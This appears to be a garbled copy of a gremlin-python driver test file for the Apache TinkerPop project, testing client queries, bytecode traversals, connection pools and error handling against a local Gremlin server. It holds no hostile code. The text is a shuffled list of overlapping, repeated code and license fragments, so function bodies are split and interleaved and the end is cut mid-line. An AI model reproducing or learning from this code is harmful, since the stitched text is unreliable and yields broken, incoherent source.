t.bytecode, 'aliases': {'g':", "distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS", "integration # test perspective because there's no way to access", "Graph().traversal() t = g.V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "pool_size=1) future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 = future2.result()", "result_set: results += result assert len(results) == 1000 t =", "the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or", "from gremlin_python.structure.graph import Graph __author__ = '<NAME> (<EMAIL>)' def test_connection(connection):", "ANY KIND, either express or implied. See the License for", "Client from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.request import RequestMessage from", "assert len(result_set.all().result()) == 6 def test_client_bytecode_options(client): # smoke test to", "http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in", "in result_set: results += result assert len(results) == 1000 t", "may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless", "# should fire an exception client.submit('1/0').all().result() assert False except GremlinServerError", "result_set = client.submit(message) assert len(result_set.all().result()) == 6 def test_iterate_result_set(client): g", "one or more contributor license agreements. See the NOTICE file", "test_big_result_set(client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message =", "g.V().limit(10) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})", "assert client.submit('x + x', {'x': 2}).all().result()[0] == 4 def test_client_eval_traversal(client):", "results = future.result() assert len(results) == 6 assert isinstance(results, list)", "future.result() assert len(results) == 6 assert isinstance(results, list) assert results_set.done.done()", "gse: # expecting the pool size to be 1 again", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) results =", "g.V().limit(10000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})", "ASF licenses this file to you under the Apache License,", "exception client.submit('1/0').all().result() assert False except GremlinServerError as gse: # expecting", "g = Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V() message", "under the License is distributed on an \"AS IS\" BASIS,", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result())", "= RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) client =", "len(results) == 1000 t = g.V().limit(10000) message = RequestMessage('traversal', 'bytecode',", "results_set.done.done() assert 'host' in results_set.status_attributes def test_client_simple_eval(client): assert client.submit('1 +", "RequestMessage from gremlin_python.process.strategies import OptionsStrategy from gremlin_python.process.graph_traversal import __ from", "The ASF licenses this file to you under the Apache", "way to access the internals of the strategy via bytecode", "= g.V().limit(100) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "file distributed with this work for additional information regarding copyright", "= RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set =", "1').all().result()[0] == 2 def test_client_simple_eval_bindings(client): assert client.submit('x + x', {'x':", "'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) == 6 ## t", "should fire an exception client.submit('1/0').all().result() assert False except GremlinServerError as", "because there's no way to access the internals of the", "len(result_set.all().result()) == 6 def test_connection_share(client): # Overwrite fixture with pool_size=1", "assert len(client.submit('g.V()').all().result()) == 6 def test_client_error(client): try: # should fire", "this file except in compliance with the License. You may", "client.submit('x + x', {'x': 2}).all().result()[0] == 4 def test_client_eval_traversal(client): assert", "'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2", "len(results) == 1 t = g.V().limit(10) message = RequestMessage('traversal', 'bytecode',", "result_set2 = future2.result() assert len(result_set2.all().result()) == 6 # This future", "= future.result() assert len(result_set.all().result()) == 6 def test_connection_share(client): # Overwrite", "assert len(results) == 1000 t = g.V().limit(10000) message = RequestMessage('traversal',", "= secure_client.submit(message) results = [] for result in result_set: results", "'gmodern'}}) future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 = future2.result()", "t.bytecode, 'aliases': {'g': 'gmodern'}}) results_set = connection.write(message).result() future = results_set.all()", "def test_big_result_set(client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message", "len(results) == 100 t = g.V().limit(1000) message = RequestMessage('traversal', 'bytecode',", "to finish for the second to yield result - pool_size=1", "result in result_set: results += result assert len(results) == 100", "'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) == 6", "perspective because there's no way to access the internals of", "\"y\": True})).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "file except in compliance with the License. You may obtain", "== 6 def test_client_error(client): try: # should fire an exception", "for the second to yield result - pool_size=1 assert future.done()", "result in result_set: results += result assert len(results) == 6", "pool_size=1) g = Graph().traversal() t = g.V() message = RequestMessage('traversal',", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message)", "assert isinstance(results, list) assert results_set.done.done() assert 'host' in results_set.status_attributes def", "{'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set = client.submit(message) results =", "{'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set = secure_client.submit(message) results =", "def test_multi_conn_pool(client): g = Graph().traversal() t = g.V() message =", "OR CONDITIONS OF ANY KIND, either express or implied. See", "ex: assert 'exceptions' in ex.status_attributes assert 'stackTrace' in ex.status_attributes def", "def test_connection(connection): g = Graph().traversal() t = g.V() message =", "== 2 def test_client_simple_eval_bindings(client): assert client.submit('x + x', {'x': 2}).all().result()[0]", "assert 'exceptions' in ex.status_attributes assert 'stackTrace' in ex.status_attributes def test_client_connection_pool_after_error(client):", "assert gse.status_code == 597 assert client.available_pool_size == 1 def test_client_bytecode(client):", "the internals of the strategy via bytecode g = Graph().traversal()", "under the Apache License, Version 2.0 (the \"License\"); you may", "assert len(result_set.all().result()) == 6 def test_iterate_result_set(client): g = Graph().traversal() t", "== 597 assert client.available_pool_size == 1 def test_client_bytecode(client): g =", "in result_set: results += result assert len(results) == 10 t", "client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future = client.submitAsync(message) future2 =", "way to really validate this from an integration # test", "6 def test_client_bytecode_options(client): # smoke test to validate serialization of", "gse.status_code == 597 assert client.available_pool_size == 1 def test_client_bytecode(client): g", "t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) future2 = client.submitAsync(message2)", "== 6 def test_client_async(client): g = Graph().traversal() t = g.V()", "message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set", "{'g': 'g'}}) result_set = secure_client.submit(message) results = [] for result", "Graph __author__ = '<NAME> (<EMAIL>)' def test_connection(connection): g = Graph().traversal()", "strategy via bytecode g = Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\",", "= client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 = future2.result() assert len(result_set2.all().result())", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "t = g.with_(\"x\", \"test\").with_(\"y\", True).V() message = RequestMessage('traversal', 'bytecode', {'gremlin':", "See the License for the specific language governing permissions and", "+= result assert len(results) == 1000 t = g.V().limit(10000) message", "of OptionsStrategy. no way to really validate this from an", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) future2 =", "import GremlinServerError from gremlin_python.driver.client import Client from gremlin_python.driver.protocol import GremlinServerError", "t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) ==", "regarding copyright ownership. The ASF licenses this file to you", "file to you under the Apache License, Version 2.0 (the", "after query returned assert gse.status_code == 597 assert client.available_pool_size ==", "1 t = g.V().limit(10) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "results += result assert len(results) == 10000 def test_big_result_set_secure(secure_client): g", "test_client_bytecode(client): g = Graph().traversal() t = g.V() message = RequestMessage('traversal',", "= client.submit(message) results = [] for result in result_set: results", "client.submit('1 + 1').all().result()[0] == 2 def test_client_simple_eval_bindings(client): assert client.submit('x +", "in writing, software distributed under the License is distributed on", "required by applicable law or agreed to in writing, software", "{'g': 'g'}}) result_set = client.submit(message) results = [] for result", "g = Graph().traversal() t = g.V() message = RequestMessage('traversal', 'bytecode',", "g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message = RequestMessage('traversal',", "== 10 t = g.V().limit(100) message = RequestMessage('traversal', 'bytecode', {'gremlin':", "language governing permissions and limitations under the License. ''' import", "def test_connection_share(client): # Overwrite fixture with pool_size=1 client client =", "the NOTICE file distributed with this work for additional information", "'aliases': {'g': 'gmodern'}}) client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future =", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) client = Client('ws://localhost:45940/gremlin',", "= [] for result in result_set: results += result assert", "future2 = client.submitAsync(message2) result_set2 = future2.result() assert len(result_set2.all().result()) == 6", "agreements. See the NOTICE file distributed with this work for", "test_client_error(client): try: # should fire an exception client.submit('1/0').all().result() assert False", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) result_set", "to the Apache Software Foundation (ASF) under one or more", "from gremlin_python.driver.client import Client from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.request", "\"test\").with_(\"y\", True).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "software distributed under the License is distributed on an \"AS", "distributed under the License is distributed on an \"AS IS\"", "= future2.result() assert len(result_set2.all().result()) == 6 # This future has", "6 assert isinstance(results, list) assert results_set.done.done() assert 'host' in results_set.status_attributes", "== 6 assert isinstance(results, list) assert results_set.done.done() assert 'host' in", "future = results_set.all() results = future.result() assert len(results) == 6", "CONDITIONS OF ANY KIND, either express or implied. See the", "= Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message = RequestMessage('traversal', 'bytecode',", "Version 2.0 (the \"License\"); you may not use this file", "<filename>gremlin-python/src/main/jython/tests/driver/test_client.py ''' Licensed to the Apache Software Foundation (ASF) under", "== 1 def test_client_bytecode(client): g = Graph().traversal() t = g.V()", "Licensed to the Apache Software Foundation (ASF) under one or", "results += result assert len(results) == 6 def test_client_async(client): g", "assert len(results) == 6 def test_client_async(client): g = Graph().traversal() t", "'gmodern'}}) message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})", "= RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future =", "not use this file except in compliance with the License.", "2.0 (the \"License\"); you may not use this file except", "copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable", "= Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try: # should fire an exception", "or may not be done here result_set = future.result() assert", "you may not use this file except in compliance with", "with pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try: #", "= results_set.all() results = future.result() assert len(results) == 6 assert", "pool_size=1 assert future.done() result_set = future.result() assert len(result_set.all().result()) == 6", "is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR", "the License. You may obtain a copy of the License", "'gmodern'}}) results_set = connection.write(message).result() future = results_set.all() results = future.result()", "Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try: # should fire an exception client.submit('1/0').all().result()", "{'g': 'gmodern'}}) result_set = client.submit(message) results = [] for result", "(<EMAIL>)' def test_connection(connection): g = Graph().traversal() t = g.V() message", "use this file except in compliance with the License. You", "gremlin_python.process.strategies import OptionsStrategy from gremlin_python.process.graph_traversal import __ from gremlin_python.structure.graph import", "Apache Software Foundation (ASF) under one or more contributor license", "message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) results_set", "+ 1').all().result()[0] == 2 def test_client_simple_eval_bindings(client): assert client.submit('x + x',", "g.V().limit(100) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})", "be done here result_set = future.result() assert len(result_set.all().result()) == 6", "gremlin_python.driver.request import RequestMessage from gremlin_python.process.strategies import OptionsStrategy from gremlin_python.process.graph_traversal import", "assert len(results) == 10000 def test_big_result_set_secure(secure_client): g = Graph().traversal() t", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) results_set = connection.write(message).result()", "{'x': 2}).all().result()[0] == 4 def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) == 6", "= g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V() message = RequestMessage('traversal', 'bytecode', {'gremlin':", "Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V() message = RequestMessage('traversal',", "= RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set =", "__.loops())).times(20000).count() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})", "assert 'host' in results_set.status_attributes def test_client_simple_eval(client): assert client.submit('1 + 1').all().result()[0]", "may or may not be done here result_set = future.result()", "= '<NAME> (<EMAIL>)' def test_connection(connection): g = Graph().traversal() t =", "to be 1 again after query returned assert gse.status_code ==", "def test_client_bytecode_options(client): # smoke test to validate serialization of OptionsStrategy.", "governing permissions and limitations under the License. ''' import pytest", "6 ## t = g.with_(\"x\", \"test\").with_(\"y\", True).V() message = RequestMessage('traversal',", "to validate serialization of OptionsStrategy. no way to really validate", "g.V().limit(1000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})", "10 t = g.V().limit(100) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "result in result_set: results += result assert len(results) == 10", "in ex.status_attributes def test_client_connection_pool_after_error(client): # Overwrite fixture with pool_size=1 client", "= g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "len(client.submit('g.V()').all().result()) == 6 def test_client_error(client): try: # should fire an", "6 def test_client_error(client): try: # should fire an exception client.submit('1/0').all().result()", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) result_set =", "result_set: results += result assert len(results) == 10 t =", "additional information regarding copyright ownership. The ASF licenses this file", "has to finish for the second to yield result -", "(the \"License\"); you may not use this file except in", "except GremlinServerError as ex: assert 'exceptions' in ex.status_attributes assert 'stackTrace'", "be 1 again after query returned assert gse.status_code == 597", "specific language governing permissions and limitations under the License. '''", "You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0", "from gremlin_python.process.graph_traversal import __ from gremlin_python.structure.graph import Graph __author__ =", "client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try: # should fire", "= Graph().traversal() t = g.V() message = RequestMessage('traversal', 'bytecode', {'gremlin':", "+= result assert len(results) == 6 def test_client_async(client): g =", "g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "6 def test_iterate_result_set(client): g = Graph().traversal() t = g.V() message", "from an integration # test perspective because there's no way", "the Apache License, Version 2.0 (the \"License\"); you may not", "or implied. See the License for the specific language governing", "Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message = RequestMessage('traversal', 'bytecode', {'gremlin':", "KIND, either express or implied. See the License for the", "in result_set: results += result assert len(results) == 10000 def", "to in writing, software distributed under the License is distributed", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1)", "'gmodern', pool_size=1) try: # should fire an exception client.submit('1/0').all().result() assert", "# smoke test to validate serialization of OptionsStrategy. no way", "'exceptions' in ex.status_attributes assert 'stackTrace' in ex.status_attributes def test_client_connection_pool_after_error(client): #", "'aliases': {'g': 'gmodern'}}) message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "law or agreed to in writing, software distributed under the", "from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.request import RequestMessage from gremlin_python.process.strategies", "assert len(result_set.all().result()) == 6 ## t = g.with_(\"x\", \"test\").with_(\"y\", True).V()", "{'g': 'gmodern'}}) message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "License. ''' import pytest from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.client", "on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF", "= Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g = Graph().traversal() t = g.V()", "+= result assert len(results) == 100 t = g.V().limit(1000) message", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set = secure_client.submit(message) results", "__author__ = '<NAME> (<EMAIL>)' def test_connection(connection): g = Graph().traversal() t", "client.submitAsync(message2) result_set2 = future2.result() assert len(result_set2.all().result()) == 6 # This", "[] for result in result_set: results += result assert len(results)", "len(results) == 6 assert isinstance(results, list) assert results_set.done.done() assert 'host'", "with this work for additional information regarding copyright ownership. The", "assert False except GremlinServerError as gse: # expecting the pool", "fire an exception client.submit('1/0').all().result() assert False except GremlinServerError as gse:", "results = [] for result in result_set: results += result", "you under the Apache License, Version 2.0 (the \"License\"); you", "second to yield result - pool_size=1 assert future.done() result_set =", "len(result_set.all().result()) == 6 def test_big_result_set(client): g = Graph().traversal() t =", "t = g.V().limit(100) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "smoke test to validate serialization of OptionsStrategy. no way to", "== 6 # with connection pool `future` may or may", "for the specific language governing permissions and limitations under the", "= g.with_(\"x\", \"test\").with_(\"y\", True).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "licenses this file to you under the Apache License, Version", "ownership. The ASF licenses this file to you under the", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) results_set = connection.write(message).result() future =", "= RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) message2 =", "result_set = client.submit(message) results = [] for result in result_set:", "for additional information regarding copyright ownership. The ASF licenses this", "the License for the specific language governing permissions and limitations", "fixture with pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g", "may not use this file except in compliance with the", "future.result() assert len(result_set.all().result()) == 6 def test_multi_conn_pool(client): g = Graph().traversal()", "g.with_(\"x\", \"test\").with_(\"y\", True).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "implied. See the License for the specific language governing permissions", "{'g': 'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) == 6 ##", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "pytest from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.client import Client from", "== 6 def test_multi_conn_pool(client): g = Graph().traversal() t = g.V()", "result in result_set: results += result assert len(results) == 1", "client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g = Graph().traversal() t =", "the second to yield result - pool_size=1 assert future.done() result_set", "import Graph __author__ = '<NAME> (<EMAIL>)' def test_connection(connection): g =", "import GremlinServerError from gremlin_python.driver.request import RequestMessage from gremlin_python.process.strategies import OptionsStrategy", "True})).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})", "len(results) == 10 t = g.V().limit(100) message = RequestMessage('traversal', 'bytecode',", "size to be 1 again after query returned assert gse.status_code", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set = client.submit(message) results", "results_set.status_attributes def test_client_simple_eval(client): assert client.submit('1 + 1').all().result()[0] == 2 def", "message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future", "OptionsStrategy from gremlin_python.process.graph_traversal import __ from gremlin_python.structure.graph import Graph __author__", "as ex: assert 'exceptions' in ex.status_attributes assert 'stackTrace' in ex.status_attributes", "with pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g =", "'aliases': {'g': 'g'}}) result_set = secure_client.submit(message) results = [] for", "len(result_set.all().result()) == 6 def test_client_bytecode_options(client): # smoke test to validate", "pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g = Graph().traversal()", "of the strategy via bytecode g = Graph().traversal() t =", "'g'}}) result_set = client.submit(message) results = [] for result in", "t = g.V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "writing, software distributed under the License is distributed on an", "'g', pool_size=1) future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 =", "except GremlinServerError as gse: # expecting the pool size to", "See the NOTICE file distributed with this work for additional", "g.V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})", "in compliance with the License. You may obtain a copy", "no way to access the internals of the strategy via", "len(result_set2.all().result()) == 6 # with connection pool `future` may or", "future.result() assert len(result_set.all().result()) == 6 def test_connection_share(client): # Overwrite fixture", "validate this from an integration # test perspective because there's", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set = client.submit(message)", "result assert len(results) == 1 t = g.V().limit(10) message =", "test to validate serialization of OptionsStrategy. no way to really", "agreed to in writing, software distributed under the License is", "== 6 def test_big_result_set(client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name',", "at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to", "no way to really validate this from an integration #", "1000 t = g.V().limit(10000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "result_set2 = future2.result() assert len(result_set2.all().result()) == 6 # with connection", "== 6 def test_iterate_result_set(client): g = Graph().traversal() t = g.V()", "This future has to finish for the second to yield", "ex.status_attributes def test_client_connection_pool_after_error(client): # Overwrite fixture with pool_size=1 client client", "result_set = secure_client.submit(message) results = [] for result in result_set:", "+= result assert len(results) == 1 t = g.V().limit(10) message", "in result_set: results += result assert len(results) == 6 def", "len(results) == 10000 def test_big_result_set_secure(secure_client): g = Graph().traversal() t =", "from gremlin_python.process.strategies import OptionsStrategy from gremlin_python.process.graph_traversal import __ from gremlin_python.structure.graph", "- pool_size=1 assert future.done() result_set = future.result() assert len(result_set.all().result()) ==", "internals of the strategy via bytecode g = Graph().traversal() t", "information regarding copyright ownership. The ASF licenses this file to", "import OptionsStrategy from gremlin_python.process.graph_traversal import __ from gremlin_python.structure.graph import Graph", "in result_set: results += result assert len(results) == 100 t", "assert len(results) == 6 assert isinstance(results, list) assert results_set.done.done() assert", "import pytest from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.client import Client", "{'g': 'gmodern'}}) client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future = client.submitAsync(message)", "either express or implied. See the License for the specific", "result assert len(results) == 100 t = g.V().limit(1000) message =", "BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "assert len(result_set.all().result()) == 6 def test_big_result_set(client): g = Graph().traversal() t", "597 assert client.available_pool_size == 1 def test_client_bytecode(client): g = Graph().traversal()", "try: # should fire an exception client.submit('1/0').all().result() assert False except", "\"License\"); you may not use this file except in compliance", "len(result_set.all().result()) == 6 def test_multi_conn_pool(client): g = Graph().traversal() t =", "License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES", "== 6 def test_client_bytecode_options(client): # smoke test to validate serialization", "an integration # test perspective because there's no way to", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) message2 = RequestMessage('traversal', 'bytecode',", "'aliases': {'g': 'gmodern'}}) results_set = connection.write(message).result() future = results_set.all() results", "= g.V().limit(10000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "and limitations under the License. ''' import pytest from gremlin_python.driver.protocol", "+ x', {'x': 2}).all().result()[0] == 4 def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result())", "License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed", "contributor license agreements. See the NOTICE file distributed with this", "License for the specific language governing permissions and limitations under", "t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "here result_set = future.result() assert len(result_set.all().result()) == 6 def test_big_result_set(client):", "'gmodern'}}) client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future = client.submitAsync(message) future2", "assert len(result_set.all().result()) == 6 def test_connection_share(client): # Overwrite fixture with", "future = client.submitAsync(message) result_set = future.result() assert len(result_set.all().result()) == 6", "to really validate this from an integration # test perspective", "def test_client_simple_eval_bindings(client): assert client.submit('x + x', {'x': 2}).all().result()[0] == 4", "= RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) results_set =", "t.bytecode, 'aliases': {'g': 'gmodern'}}) client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future", "t.bytecode, 'aliases': {'g': 'g'}}) result_set = secure_client.submit(message) results = []", "message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future", "from gremlin_python.driver.request import RequestMessage from gremlin_python.process.strategies import OptionsStrategy from gremlin_python.process.graph_traversal", "ex.status_attributes assert 'stackTrace' in ex.status_attributes def test_client_connection_pool_after_error(client): # Overwrite fixture", "results_set = connection.write(message).result() future = results_set.all() results = future.result() assert", "GremlinServerError as ex: assert 'exceptions' in ex.status_attributes assert 'stackTrace' in", "'g'}}) result_set = secure_client.submit(message) results = [] for result in", "the strategy via bytecode g = Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\":", "future2.result() assert len(result_set2.all().result()) == 6 # with connection pool `future`", "gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.client import Client from gremlin_python.driver.protocol import", "100 t = g.V().limit(1000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "there's no way to access the internals of the strategy", "via bytecode g = Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\":", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) results_set = connection.write(message).result() future", "except in compliance with the License. You may obtain a", "= client.submitAsync(message) result_set = future.result() assert len(result_set.all().result()) == 6 def", "an exception client.submit('1/0').all().result() assert False except GremlinServerError as gse: #", "result_set = future.result() assert len(result_set.all().result()) == 6 def test_big_result_set(client): g", "from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.client import Client from gremlin_python.driver.protocol", "def test_big_result_set_secure(secure_client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message", "import Client from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.request import RequestMessage", "== 6 def test_connection_share(client): # Overwrite fixture with pool_size=1 client", "len(result_set2.all().result()) == 6 # This future has to finish for", "t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V() message = RequestMessage('traversal', 'bytecode',", "compliance with the License. You may obtain a copy of", "under one or more contributor license agreements. See the NOTICE", "permissions and limitations under the License. ''' import pytest from", "assert 'stackTrace' in ex.status_attributes def test_client_connection_pool_after_error(client): # Overwrite fixture with", "'gmodern'}}) result_set = client.submit(message) results = [] for result in", "with connection pool `future` may or may not be done", "'host' in results_set.status_attributes def test_client_simple_eval(client): assert client.submit('1 + 1').all().result()[0] ==", "validate serialization of OptionsStrategy. no way to really validate this", "test_iterate_result_set(client): g = Graph().traversal() t = g.V() message = RequestMessage('traversal',", "== 10000 def test_big_result_set_secure(secure_client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name',", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) message2 = RequestMessage('traversal',", "1 def test_client_bytecode(client): g = Graph().traversal() t = g.V() message", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) future2", "result assert len(results) == 10000 def test_big_result_set_secure(secure_client): g = Graph().traversal()", "6 def test_multi_conn_pool(client): g = Graph().traversal() t = g.V() message", "Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g = Graph().traversal() t = g.V() message", "as gse: # expecting the pool size to be 1", "client.submitAsync(message) result_set = future.result() assert len(result_set.all().result()) == 6 def test_connection_share(client):", "6 # This future has to finish for the second", "finish for the second to yield result - pool_size=1 assert", "fixture with pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try:", "False except GremlinServerError as gse: # expecting the pool size", "GremlinServerError from gremlin_python.driver.client import Client from gremlin_python.driver.protocol import GremlinServerError from", "results += result assert len(results) == 100 t = g.V().limit(1000)", "(ASF) under one or more contributor license agreements. See the", "False except GremlinServerError as ex: assert 'exceptions' in ex.status_attributes assert", "assert len(result_set.all().result()) == 6 def test_multi_conn_pool(client): g = Graph().traversal() t", "= client.submit(message) assert len(result_set.all().result()) == 6 ## t = g.with_(\"x\",", "in results_set.status_attributes def test_client_simple_eval(client): assert client.submit('1 + 